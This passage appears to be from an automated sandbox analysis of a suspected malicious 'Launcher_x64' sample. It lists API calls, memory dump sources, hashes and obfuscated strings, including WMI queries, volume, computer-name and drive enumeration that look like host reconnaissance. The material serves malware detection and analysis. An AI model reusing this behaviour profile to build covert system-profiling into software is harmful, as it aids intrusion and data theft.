                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D52
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 66001078-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00D1295D
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D12968
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D129D6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1285F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D12877
                                                                                                                                                                                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00D12983
                                                                                                                                                                                                                                                                                        • _Yarn.LIBCPMT ref: 00D12999
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094), ref: 00D2DD3E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D2DDCD,00000000,?,00D421B8,?,?,?,00D2DD04,00000004,InitializeCriticalSectionEx,00D3808C,00D38094,00000000,?,00D22E6C), ref: 00D2DD48
                                                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D2DD70
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D2B13A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D2B38C
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D2B3D2
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00D2B475
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 91efc4b3dc349f036759e78655448f343bff0943902e5ea2ff66c91b96fae4f7
                                                                                                                                                                                                                                                                                        • Instruction ID: 0c8200099cb4d16fa262b94707e7af5a60e1da973d7b80af90394719c6045eb7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91efc4b3dc349f036759e78655448f343bff0943902e5ea2ff66c91b96fae4f7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2ED18DB5D00258DFCB05CFA8E8909ADBBB5FF59318F18412AE456EB352D770A942CF60
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 37169549c7c5aa0f6cf29ecd41a60a588bce80b72d7210bf3fd30d84fbfd85d8
                                                                                                                                                                                                                                                                                        • Instruction ID: e5e3a1b0967f8f95088b792858323ecb41f83be010375803340e090a0ee549c1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 37169549c7c5aa0f6cf29ecd41a60a588bce80b72d7210bf3fd30d84fbfd85d8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3251F572504222BFDB248F14F841BBA73A5FF64719F184529F851872A1DB31ED94DBB0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D28F67
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28F6E
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00D28FA8
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00D28FAF
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1c90443f78bdb872189eb8fbe34f563a4bf85e0364e26e584cb1ce7ae44292e7
                                                                                                                                                                                                                                                                                        • Instruction ID: 84c9c3a8e16057573887fa0971a1fe60e7f2e816bb19d5465881b647f67841cf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c90443f78bdb872189eb8fbe34f563a4bf85e0364e26e584cb1ce7ae44292e7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19210431205325BFDB10EF61F98086BB7AAFF243687048518F82987290DF30ED40ABB0
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 1a013f09fc2fa8644d2ab08403b7f9f86a0b062ac2a26ebecda1dd6ade13177c
                                                                                                                                                                                                                                                                                        • Instruction ID: 6a55163133050529413693b7ee9cf764962d4ccec5a9553350c2c02c323ae4f9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a013f09fc2fa8644d2ab08403b7f9f86a0b062ac2a26ebecda1dd6ade13177c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A216F71204205BF9B10AF65A8B1DEAB7A9FF45364B144528F85697251EF30EC90CBB0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00D2A301
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D232D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D24A78,?,00000000,-00000008), ref: 00D23332
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A339
                                                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D2A359
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00D143A0
                                                                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00D143AA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::_Lockit.LIBCPMT ref: 00D04DBE
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D04D90: std::_Lockit::~_Lockit.LIBCPMT ref: 00D04DE9
                                                                                                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 00D143E4
                                                                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00D1441B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000), ref: 00D321F7
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?,?,00D2AE0F,?), ref: 00D32203
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D32254: CloseHandle.KERNEL32(FFFFFFFE,00D32213,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?), ref: 00D32264
                                                                                                                                                                                                                                                                                        • ___initconout.LIBCMT ref: 00D32213
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D32235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D321D1,00D316BC,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32248
                                                                                                                                                                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32228
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D17122
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00D17131
                                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00D1713A
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00D17147
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strcspn
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3709121408-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 04a7ba87b1e7df78b3e1d97b2c647dbe7c85ea5d39be17f7aaaf40baf81e5118
                                                                                                                                                                                                                                                                                        • Instruction ID: e8326018d1d9473a0fd6fdf1c772b1e66621cf0ea287dfa24a9357d628c3a0ff
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04a7ba87b1e7df78b3e1d97b2c647dbe7c85ea5d39be17f7aaaf40baf81e5118
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA32C4B49052698FDB14DF64C981B9DFBF1BF48300F0585AAE88DA7351D730AA85CFA1
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D27BA2
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?), ref: 00D27BD9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                                                                                        • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                                        • Opcode ID: 815f3c6d89176750f160a63a57c2a0c7ee81b9d5eac64e1de8f3afb5bdced2f8
                                                                                                                                                                                                                                                                                        • Instruction ID: a684d1ddf9c2066c4642cdb529d538a93ebfd6ec67fe451723e648d8d367294d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 815f3c6d89176750f160a63a57c2a0c7ee81b9d5eac64e1de8f3afb5bdced2f8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09511671A08321AADB35AB71EC42FBA73A8EF64708F180469FA45DB181FB70D940D775
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D22B4B,?,?,00000000,00000000,00000000,?), ref: 00D22C6F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                                        • Opcode ID: 085dbb4d49eb33809942be9a2e986f87e671d758556dd38fb71b11218ebb0e18
                                                                                                                                                                                                                                                                                        • Instruction ID: 59674225448f26e6fe65cc4255fb2b84408fd8e463ce21aa2f9a658876acec4d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 085dbb4d49eb33809942be9a2e986f87e671d758556dd38fb71b11218ebb0e18
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE415B72900219BFCF15DF98ED81AEE7BB5FF68308F188099F90467221D3359961DBA1
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D2272D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                                        • Opcode ID: ab442a48b86844931e46a82c5d08626745082cb09e4190d0b5adf3c61f8e3191
                                                                                                                                                                                                                                                                                        • Instruction ID: 10cdc765b1db3b60bacc4045ddbd814b565e1eb8eeaab7d1dd4c98041baf4467
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab442a48b86844931e46a82c5d08626745082cb09e4190d0b5adf3c61f8e3191
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5031A136400229BBCF264F54E84187ABB66FF6871DB1C8559FC544A121C3B2DD61DBB2
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D13114
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,?), ref: 00D13139
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D17223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D15F93,?,?,?,?,00D15F93,00001000,00D3E1AC,00001000), ref: 00D17284
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1F7B9: IsProcessorFeaturePresent.KERNEL32(00000017,00D1A37B,?,?,?,?,00000000), ref: 00D1F7D5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 432f64a3b700b3dd4e3842db495c8ff75ac6d962bfe820aa276ab8455ebad763
                                                                                                                                                                                                                                                                                        • Instruction ID: 4927b0276cdcd7d6933414976c06b86d90ca4274e2d159efdb06552996297a3a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 432f64a3b700b3dd4e3842db495c8ff75ac6d962bfe820aa276ab8455ebad763
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA213A32D00318BBCF24DF95E9459EEB7B9EF08710F580419E519AB650DA30AEC5CBB1

                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                        Execution Coverage:9.7%
                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                        Signature Coverage:57.9%
                                                                                                                                                                                                                                                                                        Total number of Nodes:413
                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:29

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437CF9
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(10401E4F), ref: 00437D78
                                                                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437DB6
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(A210A018), ref: 00437E12
                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(105A1E4E), ref: 00437EDA
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(2625241B), ref: 00437F4C
                                                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438245
                                                                                                                                                                                                                                                                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00438281
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
                                                                                                                                                                                                                                                                                        • String ID: ()$0j6l$1-lw$7v.H$9]^_$A%T'$Dx$M!@#$MN
                                                                                                                                                                                                                                                                                        • API String ID: 505850577-2631378170
                                                                                                                                                                                                                                                                                        • Opcode ID: e0c2a04e89183fa61c242c274a676a16a0f5589baa0ff97e0d627b20027def06
                                                                                                                                                                                                                                                                                        • Instruction ID: a0f1f38f0aa8d91442959c38e5ab5fd8015b3e1277f0a867d9220f2f779a2222
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0c2a04e89183fa61c242c274a676a16a0f5589baa0ff97e0d627b20027def06
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A942F072A083508FD310CF64C88179BFBE1EBD9310F19892EF9D59B391D678D8068B96

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 103 432740-43282c GetSystemMetrics * 2 109 432833-432bdb 103->109
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
Similarity
• API ID: MetricsSystem
• String ID: $!3C$3/C$>-C$H3C$I2C$O.C$l3C$.C$3C
• API String ID: 4116985748-142951046

Control-flow Graph
• API call in graph: GetLogicalDrives (block 423681-4236a1)
Strings
Memory Dump Source
• Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
Similarity
• API ID:
• String ID: Fw$nu$su$KM
• API String ID: 0-4031965064

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 0040863A
• GetCurrentThreadId.KERNEL32 ref: 00408640
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040864F
• GetForegroundWindow.USER32(?,00000010,00000000), ref: 00408655
• ExitProcess.KERNEL32 ref: 00408694
Memory Dump Source
• Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0

Control-flow Graph
APIs
• GetComputerNameExA.KERNEL32(00000006,?,?), ref: 0042CE8D
Memory Dump Source
• Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0

Control-flow Graph
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                        • String ID: (-.o$Y
                                                                                                                                                                                                                                                                                        • API String ID: 2994545307-3975210238
                                                                                                                                                                                                                                                                                        • Opcode ID: 5836a6319e0d82008b8d91f2484fa105ce52bfeb4640bd1525e8b197794c4d8d
                                                                                                                                                                                                                                                                                        • Instruction ID: 2fd69eb372224707830a6684b889158793aac8ed2c8f35a98a6474a8a9c76d1c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5836a6319e0d82008b8d91f2484fa105ce52bfeb4640bd1525e8b197794c4d8d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8DB16E727043618BDB14DF25D8426ABB792EFD5304F9B853EE8858B341D239ED06C39A
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2610266565.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: <;:9$@
                                                                                                                                                                                                                                                                                        • API String ID: 0-663980302
